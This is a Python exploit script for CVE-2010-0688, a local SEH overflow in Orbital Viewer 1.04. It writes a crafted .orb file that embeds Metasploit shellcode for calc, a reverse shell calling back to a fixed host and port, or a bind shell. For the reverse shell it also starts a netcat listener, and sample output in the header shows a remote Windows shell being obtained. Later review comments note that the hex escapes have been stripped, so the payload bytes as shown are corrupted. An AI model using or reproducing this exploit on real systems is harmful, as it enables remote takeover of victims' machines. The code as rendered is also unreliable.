# Title : Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Published : 2010-02-26
# Author : mr_me
#!/usr/bin/python
#
################################################################
#
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: x00x0axbdx0dx20
# Here we go.. ! ...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
# 1: calc.exe
# 2: reverse shell
# 3: bind shell
# [+] which shellcode? 2
# [+] Vulnerable file created!
# [+] Listening on port 4444...
# listening on [any] 4444 ...
# 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Steve>
#
import sys, os
# Banner: ASCII-art logo plus the exploit title. The art was drawn with
# backslash characters that this rendering has stripped, so it prints skewed.
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit"
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
#
# Payload 1 (benign proof of concept): a Metasploit-generated windows/exec
# stub that starts calc.exe. NOTE: in this rendering the "\" of every "\xNN"
# escape has been lost, so each "xNN" is three characters of text rather than
# one byte; the byte counts in these generator comments refer to the original
# escaped form. The alpha_mixed encoder yields a short decoder stub followed
# by almost entirely printable 0x41-0x5a bytes, which is why the payload reads
# as long runs of "x4b", "x4f", "x51" and friends.
calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41")
# windows/shell_reverse_tcp - 636 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
#
# Payload 2: Metasploit windows/shell_reverse_tcp, alpha_mixed-encoded like
# `calc` above (same rendering caveat: the "\" escapes are stripped here).
# The callback address and port are baked into the encoded bytes, so the
# `nc -lvp 4444` listener started later in this script only matches the
# LHOST/LPORT in the generator comment above.
rev = ("x89xe6xdaxd8xd9x76xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx46x44x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx45x55x43x48x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x45x51"
"x4ax4bx47x39x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4cx44x49x50x43x44x45x57"
"x49x51x49x5ax44x4dx45x51x49x52x4ax4bx4ax54x47"
"x4bx50x54x46x44x47x58x42x55x4bx55x4cx4bx51x4f"
"x47x54x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b"
"x4bx39x42x4cx51x34x45x4cx45x31x48x43x46x51x49"
"x4bx42x44x4cx4bx50x43x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x48x56x45x36x46x33x43x56x45x38x46x53x46x52x43"
"x58x43x47x43x43x47x42x51x4fx46x34x4bx4fx4ex30"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx43x38"
"x43x32x51x45x42x4ax43x32x4bx4fx48x50x43x58x4e"
"x39x45x59x4bx45x4ex4dx46x37x4bx4fx48x56x51x43"
"x46x33x51x43x51x43x51x53x51x43x47x33x46x33x4b"
"x4fx4ex30x42x48x49x50x49x38x44x42x44x4ax42x46"
"x42x48x42x31x51x4cx42x46x46x33x4cx49x4bx51x4d"
"x45x42x48x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f"
"x48x56x42x4ax42x30x46x31x50x55x4bx4fx48x50x45"
"x36x43x5ax42x44x45x36x42x48x43x53x42x4dx43x5a"
"x50x50x46x39x47x59x48x4cx4cx49x4ax47x43x5ax47"
"x34x4cx49x4dx32x50x31x49x50x4ax53x4ex4ax4ax35"
"x4dx59x4bx4dx4bx4ex51x52x46x4dx4bx4ex50x42x46"
"x4cx4cx4dx43x4ax47x48x4ex4bx4ex4bx4ex4bx42x48"
"x44x32x4bx4ex4ex53x42x36x4bx4fx44x35x47x58x4b"
"x4fx4ex36x51x4bx46x37x50x52x50x51x50x51x50x51"
"x42x4ax45x51x46x31x50x51x46x35x46x31x4bx4fx48"
"x50x42x48x4ex4dx4ex39x44x45x48x4ex46x33x4bx4f"
"x4ex36x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x43"
"x58x4dx37x43x49x48x46x44x39x4bx4fx43x45x43x34"
"x4bx4fx49x46x4bx4fx42x57x4bx4cx4bx4fx4ex30x45"
"x38x4ax50x4dx5ax44x44x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55
#
# Payload 3: Metasploit windows/shell_bind_tcp, alpha_mixed-encoded (same
# stripped-escape rendering caveat as `calc`). The listening port is fixed in
# the encoded bytes per the generator comment above; this script does not
# start anything locally for this choice.
bind =("xdbxc1xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx43x5ax4ax4bx50x4dx4ax48x4cx39x4bx4fx4bx4f"
"x4bx4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx47"
"x35x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4f"
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51x4a"
"x4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex50x31"
"x49x50x4dx49x4ex4cx4cx44x49x50x42x54x44x47x49"
"x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47x4b"
"x50x54x47x54x47x58x42x55x4dx35x4cx4bx51x4fx51"
"x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4bx4d"
"x59x42x4cx47x54x45x4cx43x51x49x53x50x31x49x4b"
"x43x54x4cx4bx51x53x46x50x4cx4bx47x30x44x4cx4c"
"x4bx42x50x45x4cx4ex4dx4cx4bx51x50x43x38x51x4e"
"x43x58x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx48"
"x56x45x36x50x53x42x46x43x58x47x43x46x52x42x48"
"x43x47x44x33x50x32x51x4fx46x34x4bx4fx48x50x43"
"x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx49x46"
"x51x4fx4cx49x4ax45x45x36x4dx51x4ax4dx44x48x45"
"x52x46x35x43x5ax43x32x4bx4fx48x50x42x48x49x49"
"x44x49x4cx35x4ex4dx50x57x4bx4fx4ex36x50x53x46"
"x33x46x33x46x33x51x43x50x43x50x53x47x33x50x53"
"x4bx4fx4ex30x45x36x42x48x44x51x51x4cx43x56x51"
"x43x4cx49x4bx51x4dx45x43x58x49x34x44x5ax42x50"
"x49x57x51x47x4bx4fx4ex36x42x4ax44x50x46x31x50"
"x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4ax49"
"x51x47x4bx4fx49x46x50x53x46x35x4bx4fx48x50x45"
"x38x4dx35x51x59x4bx36x51x59x46x37x4bx4fx4ex36"
"x46x30x46x34x51x44x51x45x4bx4fx48x50x4ax33x43"
"x58x4ax47x42x59x49x56x42x59x51x47x4bx4fx49x46"
"x46x35x4bx4fx4ex30x45x36x43x5ax45x34x43x56x42"
"x48x42x43x42x4dx4dx59x4dx35x42x4ax46x30x51x49"
"x47x59x48x4cx4dx59x4bx57x43x5ax51x54x4bx39x4a"
"x42x50x31x49x50x4bx43x4ex4ax4bx4ex51x52x46x4d"
"x4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58x4e"
"x4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x45x46"
"x4bx4fx43x45x47x34x4bx4fx4ex36x51x4bx46x37x50"
"x52x46x31x46x31x46x31x42x4ax43x31x46x31x46x31"
"x46x35x46x31x4bx4fx4ex30x42x48x4ex4dx48x59x45"
"x55x48x4ex46x33x4bx4fx49x46x42x4ax4bx4fx4bx4f"
"x46x57x4bx4fx4ex30x4cx4bx46x37x4bx4cx4dx53x48"
"x44x45x34x4bx4fx48x56x50x52x4bx4fx48x50x45x38"
"x4cx30x4cx4ax45x54x51x4fx46x33x4bx4fx49x46x4b"
"x4fx4ex30x41x41");
# File layout constants. `header` is the .orb magic: the two lines decode to
# the text "OrbitalFileV1.0" followed by CR LF. A crafted file is therefore a
# plausible header followed by kilobytes of 0x41 filler and 0x90 NOPs, which
# is an easy signature for a file scanner or a parser sanity check (an
# implausibly long line after the magic) to reject.
header = "x4fx72x62x69x74x61x6cx46"
header += "x69x6cx65x56x31x2ex30x0dx0a"
nops = "x90" * 1010  # intended as a 1010-byte NOP sled (in escaped form)
# 5-byte near jmp with a negative 32-bit displacement (0xfffff9c8 = -1592):
# in the intended byte layout this lands back in the filler/sled region ahead
# of whichever payload was chosen.
fly = "xe9xc8xf9xffxff"
# Next-SEH slot: a 2-byte short jmp backwards (eb f9), which appears to land
# on `fly`, padded with two NOPs.
nseh = "xebxf9x90x90"
# Only 3 bytes are written over the handler pointer, so the top byte of the
# existing address is kept -- presumably because the full address would contain
# one of the bad chars listed in the header; verify against the binary.
seh = "x50x82x45" # partial overwrite - ppr from ov.exe
# Interactive part: pick a payload, write the crafted .orb file and, for the
# reverse-shell choice only, start a local listener.
print "[+] Shellcode options"
print "t1: calc.exe"  # the leading "t" is most likely a stripped "\t"
print "t2: reverse shell"
print "t3: bind shell"
msg = '[+] which shellcode? '
uin = raw_input(msg).strip()  # Python 2 API; answer is not validated beyond "non-empty"
if not uin:
    print "[-] You have not entered 1,2 or 3, quiting"
    sys.exit(1)
# Each branch sizes the filler so that filler + payload is always 5045
# characters, keeping `fly`, `nseh` and `seh` at the same file offset whichever
# payload is chosen. No branch handles any other answer: for e.g. "4", `lol` is
# never assigned and the resulting NameError only surfaces inside the try below.
if uin == '1':
    junk = "x41" * (5045 - len(calc))
    lol = header + junk + nops + calc + fly + nseh + seh;
if uin == '2':
    junk = "x41" * (5045 - len(rev))
    lol = header + junk + nops + rev + fly + nseh + seh;
if uin == '3':
    junk = "x41" * (5045 - len(bind))
    lol = header + junk + nops + bind + fly + nseh + seh;
try:
    # NOTE(review): the file is opened before `lol` is first referenced, so on
    # an unrecognised choice an empty .orb is left on disk and the handle is
    # never closed (no finally / with). Text mode ("w") is used, not "wb".
    vulnerable = open("mr_me-owns-orbital.orb",'w')
    vulnerable.write(lol)
    vulnerable.close()
    print "[+] Vulnerable file created!"
    if uin == '2':
        # Fixed command string -- no operator input reaches the shell, so
        # there is no injection concern here. Blocks until netcat exits; the
        # port must match the LPORT baked into `rev`.
        print "[+] Listening on port 4444..."
        os.system("nc -lvp 4444")
except:
    # Bare except: every failure, including the NameError from an
    # unrecognised choice and the OSError from an unwritable directory, is
    # reduced to one generic message, which hides the bug noted above.
    print "[-] Error occured!"